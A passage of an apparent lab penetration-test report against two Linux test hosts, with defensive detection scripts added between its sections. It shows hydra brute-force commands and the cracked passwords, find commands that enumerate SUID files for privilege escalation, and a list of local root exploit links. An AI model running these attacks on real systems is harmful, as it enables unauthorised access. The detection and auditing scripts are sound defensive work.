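The run above produced roughly 400 failed FTP logins per minute from a single client for five hours, a pattern the ftp server's own log records even though the server neither locked accounts nor slowed the attempts. The following script is an added example, not part of the report, that picks such a run out of vsftpd.log and reports a success that follows a burst of failures; the log lines are constructed in vsftpd's log format (pids, times and client addresses are made up).

```shell
#!/bin/bash
# Added example, not from the report: find password guessing against vsftpd in
# its own log.  The sample lines are constructed in vsftpd.log format, one
# attempt per connection as hydra produces them; dates, pids and client
# addresses are made up.
sample_vsftpd_log() {
  cat <<'EOF'
Tue Jan 27 22:57:29 2009 [pid 2101] CONNECT: Client "192.168.1.50"
Tue Jan 27 22:57:29 2009 [pid 2101] [user] FAIL LOGIN: Client "192.168.1.50"
Tue Jan 27 22:57:29 2009 [pid 2102] [postgres] FAIL LOGIN: Client "192.168.1.50"
Tue Jan 27 22:57:30 2009 [pid 2103] [user] FAIL LOGIN: Client "192.168.1.50"
Tue Jan 27 22:57:30 2009 [pid 2104] [postgres] FAIL LOGIN: Client "192.168.1.50"
Tue Jan 27 22:57:30 2009 [pid 2105] [user] FAIL LOGIN: Client "192.168.1.50"
Tue Jan 27 22:57:31 2009 [pid 2106] [postgres] FAIL LOGIN: Client "192.168.1.50"
Tue Jan 27 22:58:02 2009 [pid 2150] [user] OK LOGIN: Client "192.168.1.50"
Tue Jan 27 23:10:11 2009 [pid 2301] [cptvm1] FAIL LOGIN: Client "192.168.1.77"
Tue Jan 27 23:10:20 2009 [pid 2302] [cptvm1] OK LOGIN: Client "192.168.1.77"
EOF
}

# Read vsftpd.log on stdin.  For every client whose FAIL LOGIN count reaches
# the threshold ($1) print:
#   <client> <failures> <distinct user names tried> <success after the burst: yes|no>
# The last column is the one to act on first: a success after a run of
# failures is the signature of a guessed password, not a mistyped one.
flag_ftp_guessing() {
  awk -v thr="${1:-20}" '
    function client()  { c = $NF; gsub(/"/, "", c); return c }
    function account() { return substr($8, 2, length($8) - 2) }   # strip [ ]
    /FAIL LOGIN: Client/ {
      ip = client(); fails[ip]++
      if (!((ip, account()) in seen)) { seen[ip, account()] = 1; users[ip]++ }
    }
    /OK LOGIN: Client/ {
      ip = client()
      if (fails[ip] >= thr) hit[ip] = 1
    }
    END {
      for (ip in fails)
        if (fails[ip] >= thr)
          printf "%s %d %d %s\n", ip, fails[ip], users[ip], ((ip in hit) ? "yes" : "no")
    }' | sort
}

sample_vsftpd_log | flag_ftp_guessing 5
```

A per-session limit such as vsftpd's max_login_fails does not stop a tool that opens a fresh connection for every guess, so the blocking or alerting has to key on the client address as this script does.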
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd,
operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa
Username/password: user/digital
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp    rpcbind    2 (rpc #100000)
  939/tcp    status     1 (rpc #100024)

ii. Discovery of password for cptvm1 and cptvm2 accounts
Upon the successful login to the cptvm1 host, the /etc/passwd file was
reviewed. This provided the names of all user accounts on the cptvm1 host. Two
accounts of high interest, cptvm1 and cptvm2, were identified. While the
configuration of the cptvm1 host was being researched, a brute force password
guessing attack was launched against the cptvm1 and cptvm2 users.
The initial attack had an incorrect switch in the command line (-f). This
switch instructs hydra to stop as soon as a valid user name/password pair is
found. As a result of the incorrect switch, a second attack to discover the
cptvm2 account password had to be run. The end result of the attacks was the
discovery of the cptvm1 and cptvm2 passwords (cptvm1/windows, cptvm2/linux).
The credentials were validated by sshing into the cptvm1 host with both
accounts. Successful ssh connections were also established to the cptvm2 host
using both accounts. The /etc/passwd file on the cptvm2 host was reviewed for
accounts of interest.
bt ~ # cat usernames/cptvm1.users2.txt
cptvm1
cptvm2
bt ~ # hydra -e n -f -L usernames/cptvm1.users2.txt -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 18:26:44
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 416.00 tries/min, 416 tries in 00:01h, 139342 todo in 05:35h
[STATUS] 405.33 tries/min, 1216 tries in 00:03h, 138542 todo in 05:42h
[STATUS] 406.86 tries/min, 2848 tries in 00:07h, 136910 todo in 05:37h
[STATUS] 406.40 tries/min, 6096 tries in 00:15h, 133662 todo in 05:29h
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 20:38:12
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 8410.00 tries/min, 8410 tries in 00:01h, 131348 todo in 00:16h
[STATUS] 3072.00 tries/min, 9216 tries in 00:03h, 130542 todo in 00:43h
[STATUS] 1549.71 tries/min, 10848 tries in 00:07h, 128910 todo in 01:24h
[STATUS] 151.78 tries/min, 12987 tries in 01:25h, 126771 todo in 13:56h
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:39
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
bt ~ # hydra -R
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-28 21:12:53
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 22420.00 tries/min, 22420 tries in 00:01h, 117338 todo in 00:06h
[STATUS] 7740.67 tries/min, 23222 tries in 00:03h, 116536 todo in 00:16h
[STATUS] 3550.57 tries/min, 24854 tries in 00:07h, 114904 todo in 00:33h
[STATUS] 1873.47 tries/min, 28102 tries in 00:15h, 111656 todo in 00:60h
[STATUS] 1116.58 tries/min, 34614 tries in 00:31h, 105144 todo in 01:35h
[STATUS] 874.72 tries/min, 41112 tries in 00:47h, 98646 todo in 01:53h
[STATUS] 755.90 tries/min, 47622 tries in 01:03h, 92136 todo in 02:02h
[STATUS] 685.14 tries/min, 54126 tries in 01:19h, 85632 todo in 02:05h
[STATUS] 638.21 tries/min, 60630 tries in 01:35h, 79128 todo in 02:04h
[STATUS] 604.82 tries/min, 67135 tries in 01:51h, 72623 todo in 02:01h
[21][ftp] host: 192.168.1.200
login: cptvm1
password: windows
[STATUS] attack finished for 192.168.1.200 (valid pair found)
Hydra (http://www.thc.org) finished at 2009-01-28 23:04:25
bt ~ # hydra -e n -l cptvm2 -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-29 22:54:56
[DATA] 16 tasks, 1 servers, 69879 login tries (l:1/p:69879), ~4367 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 401.00 tries/min, 401 tries in 00:01h, 69478 todo in 02:54h
[STATUS] 401.00 tries/min, 1203 tries in 00:03h, 68676 todo in 02:52h
[STATUS] 403.43 tries/min, 2824 tries in 00:07h, 67055 todo in 02:47h
[STATUS] 405.00 tries/min, 6075 tries in 00:15h, 63804 todo in 02:38h
[STATUS] 405.77 tries/min, 12579 tries in 00:31h, 57300 todo in 02:22h
[STATUS] 406.02 tries/min, 19083 tries in 00:47h, 50796 todo in 02:06h
[STATUS] 406.17 tries/min, 25589 tries in 01:03h, 44290 todo in 01:50h
[STATUS] 406.22 tries/min, 32091 tries in 01:19h, 37788 todo in 01:34h
[STATUS] 406.26 tries/min, 38595 tries in 01:35h, 31284 todo in 01:18h
[STATUS] 406.28 tries/min, 45097 tries in 01:51h, 24782 todo in 01:01h
[21][ftp] host: 192.168.1.200
login: cptvm2
password: linux
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-30 00:47:01
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp,
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd,
sync, user, uucp, vcsa, webalizer, xfs
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp    rpcbind    2 (rpc #100000)
  939/tcp    status     1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux

F. Research of cptvm1 and cptvm2 hosts
i. cptvm1
Various data was gathered pertaining to the permissions of files within the
system. Items of interest were files with permissions set to run as root,
files with permissions incorrectly set to allow anyone to read/write/execute
them, and files owned by one of the accounts with a known password.
The locations of all files owned by the cptvm1, cptvm2 and user accounts
(accounts we have passwords for) were gathered. This may provide the ability
to access data or executables we normally should not have privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 -o -user user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2ouseruser_200.txt

The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_200.txt

The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 -o -group user \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2ogroupuser_200.txt

The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@cptvm1 ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_200.txt

The information gathered during this phase was used mainly for exploit
research.
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp,
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd,
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp    rpcbind    2 (rpc #100000)
  939/tcp    status     1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Username/password: cptvm1/windows, cptvm2/linux

ii. cptvm2
Various data was gathered pertaining to the kernel version and permissions of
files within the system. Items of interest were files with permissions set to
run as root, files with permissions incorrectly set to allow anyone to
read/write/execute them, and files owned by one of the accounts with a known
password.
Up to this point, the specific version of the Linux kernel was not known. To
gather this information, the uname command was used.
[cptvm1@localhost ~ ]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux

The locations of all files owned by the cptvm1 and cptvm2 accounts (accounts
we have passwords for) were gathered. This may provide the ability to access
data or executables we normally should not have privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a \( -user cptvm1 -o -user cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-usercptvm1-o-usercptvm2_104.txt

The locations of all files having read and execute permissions set for
other were gathered. This may provide the ability to read data or
execute tasks we normally should not have privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +003 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm003_104.txt

The locations of all files that are owned by a group we have access to
and are readable or executable were gathered. This may provide the
ability to read data or execute tasks we normally should not have
privileges to.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +030 -a \( -group cptvm1 -o -group cptvm2 \) -printf "%m %u %g %h/%f\\n" > ~/find-typefa-not-typel-a-perm030-a-groupcptvm1-ogroupcptvm2_104.txt

The locations of all files that are set to execute as the root user were
gathered. This will provide a list of executables that should be
researched for exploits.
[cptvm1@localhost ~ ]$ find / -type f -a -not -type l -a -perm +4000 -printf "%m %u %g %h/%f\\n" > ~/find-typef-a-not-typel-a-perm4000_104.txt

The information gathered during this phase was used mainly for exploit
research. However, several files of interest were discovered. Namely,
the CISngtool (Center for Internet Security, Next Generation scoring
tool - http://www.cisecurity.org).
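
The find commands above, run on cptvm1 and repeated here on cptvm2, write one line per file in the form <mode> <owner> <group> <path>. The following script is an added example, not part of the report, that audits such output from the administrator's side instead of reading the SUID list by eye: it flags setuid binaries that are writable by group or other, setuid to a non-root account, or outside the standard system directories. The input is constructed; three of its paths are taken from the report's own lists and the rest are made-up misconfigurations.

```shell
#!/bin/bash
# Added example, not from the report: audit the "<mode> <owner> <group> <path>"
# lines that find ... -perm +4000 -printf "%m %u %g %h/%f\n" writes.
# The sample is constructed: the first three paths appear in the report's SUID
# lists, the others are made-up misconfigurations placed there to be caught.
sample_find_output() {
  cat <<'EOF'
4755 root root /bin/ping
4755 root root /usr/bin/passwd
4711 root root /usr/bin/sudo
4777 root root /usr/local/bin/backup-helper
4755 root root /tmp/.cache/helper
2755 root mail /usr/bin/mail
4755 cptvm1 cptvm1 /home/cptvm1/runme
755 root root /bin/ls
EOF
}

# For each setuid entry on stdin, print "<path> <findings>" when something is
# wrong with it:
#   writable      group or other can write the file, so anyone in that group
#                 (or anyone at all) can replace code that runs as the owner
#   not-root      setuid to an ordinary account rather than root
#   odd-location  outside /bin, /sbin, /usr and /lib, where package-managed
#                 setuid binaries live
# find's %m prints the octal mode without a leading zero, so a four-digit
# value means special bits are set and its first digit carries setuid (4).
# Paths containing spaces would need a different field separator.
audit_setuid() {
  awk '
    function has_bit(digit, bit) { return int(digit / bit) % 2 == 1 }
    {
      mode = $1; owner = $2; path = $4
      if (length(mode) < 4) next                          # no special bits
      if (!has_bit(substr(mode, 1, 1), 4)) next           # setgid/sticky only
      group = substr(mode, 3, 1); other = substr(mode, 4, 1)
      findings = ""
      if (has_bit(group, 2) || has_bit(other, 2)) findings = findings " writable"
      if (owner != "root")                         findings = findings " not-root"
      if (path !~ /^\/(bin|sbin|usr|lib)\//)       findings = findings " odd-location"
      if (findings != "") print path findings
    }'
}

sample_find_output | audit_setuid
```

The same script applied to the _perm4000 files above reports nothing for a stock Red Hat install; a finding is the place to start both a hardening fix and an exploit search.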
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, bin, cptvm1, cptvm2, daemon, ftp, games, gdm,
gopher, halt, lp, mail, mailnull, named, news, nfsnobody, nobody, nscd, ntp,
operator, pcap, postgres, root, rpc, rpcuser, rpm, shutdown, smmsp, squid, sshd,
sync, user, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/sbin/suexec,
/sbin/pam_timestamp_check, /usr/bin/passwd, /usr/lib/news/bin/inndstart,
/usr/lib/news/bin/startinnfeed, /usr/lib/news/bin/rnews, /sbin/pwdb_chkpwd,
/sbin/unix_chkpwd, /usr/X11R6/bin/XFree86, /usr/bin/chfn, /usr/bin/chsh,
/usr/bin/newgrp, /usr/libexec/openssh/ssh-keysign, /usr/sbin/userhelper,
/bin/mount, /bin/ping, /bin/su, /bin/umount, /usr/bin/at, /usr/bin/chage,
/usr/bin/crontab, /usr/bin/gpasswd, /usr/bin/lppasswd, /usr/bin/rcp,
/usr/bin/rlogin, /usr/bin/rsh, /usr/sbin/ping6, /usr/sbin/traceroute,
/usr/sbin/traceroute6, /usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: user/digital, cptvm1/windows, cptvm2/linux
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.18-8
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp    rpcbind    2 (rpc #100000)
  939/tcp    status     1 (rpc #100024)
User accounts: adm, apache, avahi, bin, cptvm1, cptvm2, daemon, dbus,
distcache, ftp, games, gdm, gopher, haldaemon, halt, lp, mail, mailnull, named,
news, nfsnobody, nobody, nscd, ntp, operator, pcap, root, rpc, rpcuser, rpm,
shutdown, smmsp, squid, sshd, sync, uucp, vcsa, webalizer, xfs
Files that execute as root: /usr/bin/sudo, /usr/bin/sudoedit,
/media/.hal-mtab-lock, /usr/sbin/suexec, /usr/bin/Xorg, /usr/bin/chfn,
/usr/bin/chsh, /usr/sbin/userhelper, /usr/lib/squid/ncsa_auth,
/usr/lib/squid/pam_auth, /bin/mount, /bin/ping, /bin/ping6, /bin/su,
/bin/umount, /sbin/mount.nfs, /sbin/mount.nfs4, /sbin/pam_timestamp_check,
/sbin/umount.nfs, /sbin/umount.nfs4, /sbin/unix_chkpwd, /usr/bin/at,
/usr/bin/chage, /usr/bin/gpasswd, /usr/bin/newgrp, /usr/bin/passwd,
/usr/bin/rcp, /usr/bin/rlogin, /usr/bin/rsh, /usr/kerberos/bin/ksu,
/usr/libexec/openssh/ssh-keysign, /usr/sbin/ccreds_validate,
/usr/sbin/userisdnctl, /usr/sbin/usernetctl
Username/password: cptvm1/windows, cptvm2/linux

G. Penetration of cptvm1
i. Local exploit research via anyside.org
The list of files designated to execute as root was processed to gain only the
base name of the file. This list would be used to search against the
anyside.org exploit list.
$ awk '{ print "basename ", $4 }' suid_root_200.txt > basename_200.txt
$ chmod +x basename_200.txt
$ ./basename_200.txt | sort -u > basename-2_200.txt
$ cat basename-2_200.txt
XFree86
at
chage
chfn
chsh
crontab
gpasswd
inndstart
lppasswd
mount
newgrp
pam_timestamp_check
passwd
ping
ping6
pwdb_chkpwd
rcp
rlogin
rnews
rsh
ssh-keysign
startinnfeed
su
sudo
suexec
traceroute
traceroute6
umount
unix_chkpwd
userhelper
userisdnctl
usernetctl
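The same inventory that feeds the exploit search above is what a defender keeps as a baseline: a setuid-root file that was not there at build time is one of the first things a post-compromise review should surface. The script below is an added example and is not part of this report. It reduces a path list to base names the way the awk/basename step does, then diffs a later inventory against a saved baseline and exits non-zero when anything changed. The path lists inside demo() are constructed; the find command in the comment is what would produce a real inventory.

```shell
#!/bin/sh
# Added example, not part of the report: keep a baseline of setuid-root
# files and diff a later inventory against it. The path lists in demo()
# are constructed; on a real host an inventory comes from
#   find / -xdev -type f -perm -4000 -uid 0 -print | sort

# Unique base names of the paths read from stdin, one path per line.
# This is the reduction the report performs with awk and basename.
suid_basenames() {
    sed 's#.*/##' | sort -u
}

# suid_diff BASELINE CURRENT
# Print "+ path" for setuid files present only in CURRENT and "- path"
# for files present only in BASELINE. Return 0 when the lists match and
# 1 when they differ, so the function can drive a cron job or an alert.
suid_diff() {
    old=$(mktemp) && new=$(mktemp) || return 2
    sort -u "$1" > "$old"
    sort -u "$2" > "$new"
    comm -13 "$old" "$new" | sed 's/^/+ /'      # new setuid file
    comm -23 "$old" "$new" | sed 's/^/- /'      # setuid file removed
    changed=$(comm -3 "$old" "$new" | wc -l | tr -d ' ')
    rm -f "$old" "$new"
    [ "$changed" -eq 0 ]
}

# Constructed demonstration: the baseline is a subset of the report's
# cptvm1 inventory; the later run has lost lppasswd and gained an
# unexpected setuid binary under /usr/local.
demo() {
    dir=$(mktemp -d)
    printf '%s\n' /usr/bin/sudo /bin/su /bin/mount /usr/bin/passwd \
        /usr/bin/lppasswd /usr/sbin/traceroute > "$dir/baseline.txt"
    printf '%s\n' /bin/su /usr/bin/sudo /bin/mount /usr/bin/passwd \
        /usr/sbin/traceroute /usr/local/bin/helper > "$dir/current.txt"
    if suid_diff "$dir/baseline.txt" "$dir/current.txt"; then
        echo "setuid inventory unchanged"
    else
        echo "setuid inventory CHANGED: review the entries above"
    fi
    rm -rf "$dir"
}

demo
```

Running the script prints the two differences followed by the CHANGED line; scheduling suid_diff against a baseline stored off-host turns the same inventory the attacker used for exploit research into a change detector.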

The list of exploits used during the remote exploit search was re-used
to search for local exploits on the cptvm1 host.
$ grep exploits\/local exploits_list.txt | grep -w -i -f ../commands/basename-2_200.txt > possible_local_200.txt
$ ll
total 1672
drwxr-xr-x   7 matt matt    238 Feb 21 14:47 ./
drwxr-xr-x  15 matt matt    510 Feb 21 14:47 ../
-rw-r--r--   1 matt matt 126720 Feb  6 14:40 exploits_list.db.tgz
-rw-r--r--   1 matt matt 702666 Sep 21 05:52 exploits_list.txt
-rw-r--r--   1 matt matt   1699 Feb 15 20:34 possible_local_200.txt
-rw-r--r--   1 matt matt   9376 Feb  6 14:43 possible_remote_200.txt

$ cat possible_local_200.txt
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071503.txt;Rocks
Clusters <= 4.1 (mount-loop) Local Root Exploit
2006-07-15;http://www.anyside.org/exp/exploits/local/2006071502.txt;Rocks
Clusters <= 4.1 (umount-loop) Local Root Exploit
2006-03-01;http://www.anyside.org/exp/exploits/local/2006030101.txt;Apple Mac
OS X (/usr/bin/passwd) Custom Passwd Local Root Exploit
2006-01-25;http://www.anyside.org/exp/exploits/local/2006012501.txt;SquirrelMail 3.1
Change Passwd Plugin Local Buffer Overflow Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110903.txt;FreeBSD
(4.x , < 5.4) master.passwd Disclosure Exploit
2005-11-09;http://www.anyside.org/exp/exploits/local/2005110902.txt;Sudo <=
1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
2005-11-08;http://www.anyside.org/exp/exploits/local/2005110801.txt;SuSE Linux
<= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit
2005-07-04;http://www.anyside.org/exp/exploits/local/2005070403.txt;Sudo 1.3.1
- 1.6.8p Pathname Validation Local Root Exploit (openbsd)
....;http://www.anyside.org/exp/exploits/local/r57sudo.c;OpenBSD sudo 1.3.1 1.6.8p local root exploit
....;http://www.anyside.org/exp/exploits/local/x_hpux_11i_nls_cu.c;The same
vulnerability to x_hp-ux11i_nls_ct.c,but exploit ping command to get root
shell
2004-9-19;http://www.anyside.org/exp/exploits/local/sudo-exploit.c;sudo
exploit.
2004-9-11;http://www.anyside.org/exp/exploits/local/cdrecordsuidshell.sh.txt;cdrecord $RSH exec() SUID Shell Creation
